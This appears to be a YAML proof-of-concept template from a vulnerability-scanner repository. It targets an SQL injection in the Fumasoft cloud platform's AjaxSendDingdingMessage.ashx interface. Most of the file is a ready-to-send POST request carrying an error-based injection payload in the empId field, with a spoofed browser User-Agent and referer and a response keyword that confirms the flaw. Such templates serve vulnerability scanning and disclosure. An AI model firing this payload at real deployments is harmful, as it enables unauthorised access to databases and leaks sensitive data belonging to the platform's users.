Poc_Scanner/poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml
2024-10-11 17:54:44 +08:00

31 lines
1.2 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: fumasoft
name: 孚盟云平台存在SQL注入漏洞
description: | # 下一行可填写漏洞描述
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。
requests: # 为空代表默认或者不启用
path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx"
method: POST
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
body-raw: |- # 如果需要发送请求体,在下一行开始填写
action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "Copyright" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞可能导致数据库敏感信息泄露。